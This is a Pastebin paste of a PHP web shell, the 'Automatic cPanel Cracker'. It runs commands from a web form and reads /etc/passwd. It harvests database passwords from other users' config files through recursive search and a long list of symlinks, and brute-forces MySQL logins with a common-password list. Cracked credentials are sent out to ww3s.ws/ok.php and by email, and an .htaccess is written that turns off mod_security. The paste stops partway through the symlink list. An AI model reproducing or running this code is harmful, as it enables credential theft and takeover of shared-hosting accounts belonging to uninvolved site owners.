ilyasinane

Untitled

Jan 12th, 2018
3,915
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 81.38 KB | None | 0 0
  1. <?php
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. echo '</head><body>';
  5. echo "
  6. <html>
  7. <body bgcolor=black>
  8. <head>
  9. <style type=text/css>
  10. body{
  11. background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFwAAAAuCAMAAACS246gAAAALVBMVEUREREMDAwSEhIUFBQQEBAODg4TExMPDw8XFxcVFRUWFhYNDQ0LCwsKCgoJCQmoaA8gAAACwElEQVR42rWW227tIAxEuYYQSP//c5ul0YicnL6CVIntmkXsMYYQQnxGSjmXEmOtIeR8HK3F2FrO53kctcZYSs69X1cI4xkhXFfv+M/Z2vWMWuczjuO6ln/Oe+FC984Y477nDAHkGMLjzjyE3oVm5k8BFALf2Bp2o/Uhu+GgU2otpRDm1G+WCo8bS0CBBpWSfh8HGztpb7Q+ZC8ccXJGmjGQcqEJ1SECQTJJOScjpes6z5RilP2LxroTrpCYIg1lJXRKcresKWmOmKCxlnIcpFQJXGiUhLcXPgYGBJVcKjcOFQvfeOb2Vvk5OcK/0fiNsRtOOmzETDGyFKjwbgU5K3SElMSGC7fQIWDdCyckB8TcSaAVaGnOamPvtkRrc5vD9j8a4ffCQRpPKJJTpcfBAgl+TjYw6luiRqsomNVayl44i0G6/RivKwOM8DEiH7hSvNH3yPvyUPMeYy+8VpxASiCcQKaEJG4FILH2zpZfNDhJyR+HD58598JxVDrmvO8YkbU1I3P2nCvi73ZAAi1la8Yj9F64gyQUHAxc+FKwg/ui5ywFD7x9kSA3eBrEXjjNyMcDOX3YhZTF194XHSPPECWUJkfy/Oig0e2FKw1jsMhozXUZkBCCpczeaLYDgngIaVFdiOD3wnE2MqV3cyVh9zNSegIMXzRtVwmgRGGM4Qah50ate+EEpofyCpzNaAUcdf3++8hbaoRc7UwlwlZ74Uq9ZfXDjACx+xn6RVO4bO7Ck4Rs4kcrH7YXLrMkpOAcGPhS/i1Oo7HGyLp1Ba708lmSeC9c6VBqDCJcjgQgW3yQQKs9cZF5c1+GoGHRoPfDe5fJ/16PBhcnAYO4b1/Ftq82ZbRSotleeO/nSZALD2bhsTP34X4/2Yz2tcYcNKX88xPjXrikQ9K3LOBx8yUMUi1qoZHVJYjXfRut9SFshf8CHnhfSb7xpWAAAAAASUVORK5CYII=')
  12. }
  13. input[type=text] {
  14. color:black;
  15. }
  16. a {
  17. color : white;
  18.  
  19. }
  20. #terma {
  21. color:black;
  22. }
  23. #kernel {
  24. }
  25. #exec {
  26.  
  27. color:red;
  28. }
  29. #zeb {
  30.  
  31. width: 525px;
  32. height: 301px;
  33. color:black;
  34. }
  35. input[type=submit] {
  36. background-color : black;
  37. }
  38. a:hover{
  39. border-bottom:1px solid aqua;
  40. }
  41. *{
  42. font-size:11px;
  43. font-family:Courier,Courier,Courier;
  44. color:white;
  45. }
  46. #menu a{
  47. padding:4px 18px;
  48. margin:0;
  49. background:darkred;
  50. text-decoration:none;
  51. letter-spacing:2px;
  52. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  53.  
  54. }
  55. </style>
  56.  
  57. <title>Automatic cPanel Cracker</title>
  58. </head>
  59. <br><center><div id=menu>
  60. <a href=?home>Home</a>
  61. <a href=?grab>Config</a>
  62. <a href=?cp>cPanel Automatic</a>
  63. <a href=?cp_jump>cPanel Jumping</a>
  64. <a href=?upl>Upload</a>
  65. </div></center>
  66. <p>
  67. <center>
  68. <img src=http://i.imgur.com/RhCNL7E.png width=260 height=300 /><br /></center><br><center><div id=menu>
  69. <a href=?jump>Jumping</a>
  70. <a href=?pws>Config Password</a>
  71. <a href=?x=symlink>Symlink</a>
  72. <a href=?cmd>CMD</a>
  73.  
  74. <a href=?cp_cracker>cPanel Brutus</a>
  75. </div></center>
  76.  
  77. <br><br><center id='kernel'>".php_uname()."<br>";
  78. echo '<img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg" height="0" width="0">';
  79. if(isset($_GET["cp_jump"])){
  80.  
  81. echo '';
  82. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  83. set_time_limit(0);
  84. ###################
  85. @$passwd = fopen('/etc/passwd','r');
  86. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  87. $pub = array();
  88. $users = array();
  89. $conf = array();
  90. $i = 0;
  91. while(!feof($passwd))
  92. {
  93. $str = fgets($passwd);
  94. if ($i > 35)
  95. {
  96. $pos = strpos($str,':');
  97. $username = substr($str,0,$pos);
  98. $dirz = '/home/'.$username.'/public_html/';
  99. if (($username != ''))
  100. {
  101. if (is_readable($dirz))
  102. {
  103. array_push($users,$username);
  104. array_push($pub,$dirz);
  105. }
  106. }
  107. }
  108. $i++;
  109. }
  110. ###################
  111. echo '<h1>CPaneL BruteForcer</h1><div class="transparan2"><br><br><textarea id=terma cols="100" rows="20">';
  112. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  113. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  114. echo "[~] Searching for passwords in config files...\n\n";
  115. foreach ($users as $user)
  116. {
  117. $path = "/home/$user/public_html/";
  118. read_dir($path,$user);
  119. }
  120. echo "\n[+] Done\n";
  121. function read_dir($path,$username)
  122. {
  123. if ($handle = opendir($path))
  124. {
  125. while (false !== ($file = readdir($handle)))
  126. {
  127. $fpath = "$path$file";
  128. if (($file != '.') and ($file != '..'))
  129. {
  130. if (is_readable($fpath))
  131. {
  132. $dr = $fpath."/";
  133. if (is_dir($dr))
  134. {
  135. read_dir($dr,$username);
  136. }
  137. else
  138. {
  139. if (
  140. ($file=='config.php')
  141. or ($file=='config.inc.php')
  142. or ($file=='conf.php')
  143. or ($file=='settings.php')
  144. or ($file=='configuration.php')
  145. or ($file=='wp_config.php')
  146. or ($file=='wp-config.php')
  147. or ($file=='inc.php')
  148. or ($file=='setup.php')
  149. or ($file=='dbconf.php')
  150. or ($file=='dbconfig.php')
  151. or ($file=='db.inc.php')
  152. or ($file=='dbconnect.php')
  153. or ($file=='connect.php')
  154. or ($file=='common.php')
  155. or ($file=='config_global.php')
  156. or ($file=='db.php')
  157. or ($file=='connect.inc.php')
  158. or ($file=='e107_config.php')
  159. or ($file=='dbconnect.inc.php'))
  160. {
  161. $pass = get_pass($fpath);
  162. if ($pass != '')
  163. {
  164. echo "[+] $fpath\n$pass\n";
  165. ftp_check($username,$pass);
  166. }
  167. }
  168. }
  169. }
  170. }
  171. }
  172. }
  173. }
  174. function get_pass($link)
  175. {
  176. @$config = fopen($link,'r');
  177. while(!feof($config))
  178. {
  179. $line = fgets($config);
  180. if (strstr($line,'pass')
  181. or strstr($line,'pwd')
  182. or strstr($line,'db_pass')
  183. or strstr($line,'dbpass')
  184. or strstr($line,'passwd'))
  185. {
  186. if (strrpos($line,'"'))
  187. {
  188. preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
  189. $pass = str_replace("]=\"","",$pass);
  190. }
  191.  
  192. else
  193. preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
  194. $pass = str_replace("]='","",$pass);
  195. return $pass[2];
  196. }
  197. }
  198. }
  199. function ftp_check($login,$pass)
  200. {
  201. @$ftp = ftp_connect('127.0.0.1');
  202. if ($ftp)
  203. {
  204. @$res = ftp_login($ftp,$login,$pass);
  205. if ($res)
  206. {
  207. echo '[FTP] '.$login.':'.$pass." Success !\n\n";
  208.  
  209. $domain = $_SERVER['HTTP_HOST'];
  210. $p21 = 21;
  211. $p22 = 22;
  212. $p2082 = 2082;
  213. $cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
  214. $cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
  215. $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
  216.  
  217.  
  218. if(!$cp22)
  219. {$a1="Error";}
  220. else
  221. {$a1="Success";fclose($cp22);}
  222.  
  223. if(!$cp21)
  224. {$a2="Error";}
  225. else
  226. {$a2="Success";fclose($cp21);}
  227.  
  228. if(!$cp2082)
  229. {$a3="Error";}
  230. else
  231. {$a3="Success";fclose($cp2082);}
  232.  
  233.  
  234. $psn ="
  235. -------------------------------------------------------------------------\n
  236. Host : $domain\n
  237. User : $login\n
  238. Pass : $pass\n
  239. -------------------------------------------------------------------------\n
  240. Accept Port \n
  241. SSH : Port $a1\n
  242. FTP : Port $a2\n
  243. cPanel : Port $a3\n
  244. -------------------------------------------------------------------------\n
  245. n";
  246. $to = "";
  247. $recip = "";
  248. $subject = "cPanel AccesS Update";
  249. $headers = "From: update<news@cp-update.info>";
  250. mail($to,$subject,$psn,$headers);
  251. mail($recip,$subject,$psn,$headers);
  252. echo '[SSH] Port' .':' .$a1. " !\n\n";
  253. echo '[FTP] Port' .':' .$a2. " !\n\n";
  254. echo '[cPanel] Port' .':' .$a3. " !\n\n";
  255.  
  256. }
  257. else ftp_quit($ftp);
  258. }
  259. }
  260. echo '</textarea><br><br><b>BruteForce Completed ...</b></body></html>';
  261.  
  262. }
  263. if(isset($_GET["cp_cracker"])){
  264. if(function_exists('apache_setenv')){
  265. @apache_setenv('no-gzip', 1);}
  266. @ini_set('zlib.output_compression', 0);
  267. @ini_set('output_buffering ',0);
  268. @ini_set('implicit_flush', 1);
  269. @ob_implicit_flush(true);
  270. @ob_end_flush();
  271. $ipserver=$_SERVER['SERVER_ADDR'];
  272. echo '
  273. <html>
  274. <style> body {font-size: 12pt; font-family: "Times New Roman"; }</style><head>
  275.  
  276. </head>
  277. <title>cPanel brutus</title>
  278. <body text="#00FF00" bgcolor="#000000" vlink="#00BFFF" link="#FF0000" alink="#008000">
  279. <div align="center">
  280. <br>
  281.  
  282. </td></tr>
  283. </table>
  284. <br />';
  285.  
  286. if(!isset($_POST['submit'])){
  287. function execute($cfe) {
  288. $res = '';
  289. if ($cfe) {
  290. if(function_exists('system')) {
  291. @ob_start();
  292. @system($cfe);
  293. $res = @ob_get_contents();
  294. @ob_end_clean();
  295. } else if(function_exists('passthru')) {
  296. @ob_start();
  297. @passthru($cfe);
  298. $res = @ob_get_contents();
  299. @ob_end_clean();
  300. } else if(function_exists('shell_exec')) {
  301. $res = @shell_exec($cfe);
  302. } else if(function_exists('exec')) {
  303. @exec($cfe,$res);
  304. $res = join("\n",$res);
  305. } else if(@is_resource($f = @popen($cfe,"r"))) {
  306. $res = '';
  307. while(!@feof($f)) {
  308. $res .= @fread($f,1024);
  309. }
  310. @pclose($f);
  311. }
  312. }
  313. return $res;
  314. }
  315. $default=execute("ls /var/mail");
  316. if(!$default){
  317. if($file=@file_get_contents('/etc/passwd')){
  318. $u=explode("\n",$file);
  319. foreach($u as $us){
  320. $uss=explode(":x:",$us);
  321. $default .=$uss[0]."\n";
  322. }
  323. }else if(function_exists('posix_getpwuid')){
  324. for($n2=500;$n2<10000;$n2++){
  325. $userinfo = posix_getpwuid($n2);
  326. $name=$userinfo['name'];
  327. if($name!=''){
  328. $default.=$name."\n";
  329. }
  330. }}else{$default="Could not get any username.try manually :)";}
  331. }
  332.  
  333. echo <<<EOF
  334. <form method="POST">
  335. <div align='center'>
  336. <table width='55%' style='border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0'>
  337. <tr>
  338. <td align='center'>
  339. <span lang='en-us'><font color='#FF0000'><b>Usernames:</b></font></span>
  340.  
  341. <p align='center'>&nbsp;<textarea rows='30' name='usernames' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>$default</textarea><br/>
  342. </p></td>
  343. <td align='center'>
  344. <span lang='en-us'><font color='#FF0000'><b>Passwords:</b></font></span>
  345.  
  346. <p align='center'>&nbsp;<textarea rows='30' name='passwords' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>123123\n123456\n1234567\n12345678\n123456789\n112233\n332211\ntest\ntest123\ncpanel\npassword\npassword1\nabc123\na1b2c3\npassw0rd\nPassword\nPassw0rd\nuser\npasswd\npasswords\npass\nchangeme\niloveyou\nfuckyou\nadmin\nqwerty\n1q2w3e\nq1w2e3\nqazqaz\n1qazxsw2\n1qaz2wsx\nqazxsw\nqazwsx</textarea><br/>
  347. </p></td>
  348. </tr>
  349. </table><br/><input type='submit' value=' Subtmit ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></form>
  350. EOF;
  351. }else{
  352. $password=array_unique(explode("\n",$_POST['passwords']));
  353. $username=array_unique(explode("\n",$_POST['usernames']));
  354. if(!set_time_limit(0)){"<font color='red'><b>ALERT:</b> set_time_limit(0) failed! Cracking will be interrupted!<br/></font>";}
  355. echo '[+]Cracking...<br/><hr width="67%" style="border: 4px dashed #FF0000;"><font color="white" size="4"><b>username<font color="red">:</font>password</b></font><br/><br/>';
  356. $count=0;
  357. $n=0;
  358. $start=time();
  359. foreach($username as $user){
  360. $count++;
  361. $user=trim($user);
  362. if ( @mysql_connect("localhost",$user,$user) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$user</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>";$n++;continue;
  363. $success=$ipserver."|".$user."|".$user."\n";
  364. $ch = curl_init();
  365. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  366. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  367. curl_setopt($ch, CURLOPT_POST, 1);
  368. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success));
  369. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  370. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  371. curl_setopt($ch, CURLOPT_HEADER, 1);
  372. $buffer = curl_exec($ch);
  373. }
  374. foreach($password as $pass){
  375. $count++;
  376. $pass=trim($pass);
  377. if ( @mysql_connect("localhost",$user,$pass) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$pass</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>";
  378. $success2=$ipserver."|".$user."|".$pass."\n";
  379. $ch = curl_init();
  380. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  381. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  382. curl_setopt($ch, CURLOPT_POST, 1);
  383. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success2));
  384. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  385. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  386. curl_setopt($ch, CURLOPT_HEADER, 1);
  387. $buffer = curl_exec($ch);
  388. $n++;break;}
  389. }
  390. }
  391. $end= time() - $start;
  392. @$per=$count/$end;
  393. if($n){
  394. echo "[*]Successfully Cracked: <font color='red'><b>$n</b></font><br/>";}
  395. echo '<font color="#00FF00">[*]Time took: '.$end.' seconds for '.$count.' tries ('.$per.'/sec)</font><br/>';
  396. }
  397. }
  398.  
  399.  
  400. ############### MULAI DARI SINI #################
  401. if(isset($_GET["cmd"])){
  402. echo "<br>";
  403. echo base64_decode("PGZvcm0gbWV0aG9kPSJwb3N0Ij4KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJHbyI+CjwvZm9ybT4=");
  404. $order=$_POST["command"];
  405. $sub=$_POST["submit"];
  406.  
  407. if(isset($sub)) {
  408. echo "<p id='exec'>".exec($order)."<p/>";
  409. }
  410. }
  411. if(isset($_GET["grab"])){
  412. echo "<p><font face=Tahoma color=#007700 size=2pt>/etc/passwd content</p><br><form method=POST><textarea id=zeb name=passwd class=area rows=15 cols=60></div>";
  413. echo file_get_contents('/etc/passwd');
  414. echo "</textarea><br><br><input name=cat class=inputzbut size=100 value=Start ! type=submit><br></form></center><br>"; @error_reporting(0);
  415. @set_time_limit(0);
  416.  
  417. if($_POST["cat"] && !$_POST["passwd"]==""){
  418. echo "<center>Checking Smylink Functions ...<br></center>";
  419. $functions=@ini_get("disable_functions");
  420. if(eregi("symlink",$functions)){
  421. die("<center><font color=red>Symlink Function is DisableD, You Can't Continue This Process !!</font></center>");
  422. }
  423. echo "<center>Checking Done Without Problems, Start Grabbing ...<br></center>";
  424. @mkdir("xBlack_Configs", 0755);
  425. @chdir("xBlack_Configs");
  426. $htaccess="
  427. Options Indexes FollowSymLinks
  428. DirectoryIndex ssssss.htm
  429. AddType txt .php
  430. AddHandler txt .php
  431. <IfModule mod_autoindex.c>
  432. IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
  433. </ifModule>
  434. <IfModule mod_security.c>
  435. SecFilterEngine Off
  436. SecFilterScanPOST Off
  437. </IfModule>
  438. Options +FollowSymLinks
  439. DirectoryIndex Sux.html
  440. Options +Indexes
  441. AddType text/plain .php
  442. AddHandler server-parsed .php
  443. AddType text/plain .html
  444. ";
  445. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  446. $passwd=$_POST["passwd"];
  447. $passwd=explode("\n",$passwd);
  448. echo "<center>Starting Symlinking ...<br></center>";
  449. foreach($passwd as $pwd){
  450. $pawd=explode(":",$pwd);
  451. $user =$pawd[0];
  452. // Now symlink Them
  453. @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  454. @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  455. @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  456. @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  457. @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  458. @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  459. @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  460. @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  461. @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  462. @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  463. @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  464. @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  465. @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  466. @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  467. @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  468. @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  469. @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  470. @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  471. @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  472. @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  473. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  474. @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  475. @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  476. @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  477. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  478. @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  479. @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  480. @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  481. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  482. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  483. @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  484. @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
  485. @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  486. @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  487. @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  488. @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  489. @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  490. @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  491. @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  492. @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  493. @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  494. @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  495. @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  496. @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  497. @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  498. @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  499. @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
  500. @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  501. @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  502. @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  503. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  504. @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  505. @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  506. @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  507. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  508. @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  509. @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  510. @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  511. @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  512. @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  513. @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  514. @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  515. @symlink('/home/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  516. @symlink('/home/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  517. @symlink('/home/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  518. @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  519. @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  520. @symlink('/home/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  521. @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  522. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  523. @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images.txt');
  524. @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  525. @symlink('/home/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  526. @symlink('/home/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  527. @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  528. @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  529. @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  530. @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  531. @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  532. @symlink('/home/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  533. @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  534. @symlink('/home/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  535. @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  536. @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  537. @symlink('/home/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  538. @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  539. @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  540. @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  541. @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  542. @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  543. @symlink('/home/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  544. @symlink('/home/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  545. @symlink('/home/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  546. @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  547. @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  548. @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  549. @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  550. @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  551. @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  552. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  553. @symlink('/home/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  554. @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  555. @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  556. @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  557. @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  558. @symlink('/home/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  559. @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  560. @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  561. @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  562. @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  563. @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  564. @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  565. @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  566. @symlink('/home/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  567. @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  568. @symlink('/home/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  569. @symlink('/home/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  570. @symlink('/home/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  571. @symlink('/home/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  572. @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  573. @symlink('/home/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  574. @symlink('/home/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  575. @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  576. @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  577. @symlink('/home/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  578. @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  579. @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  580. @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
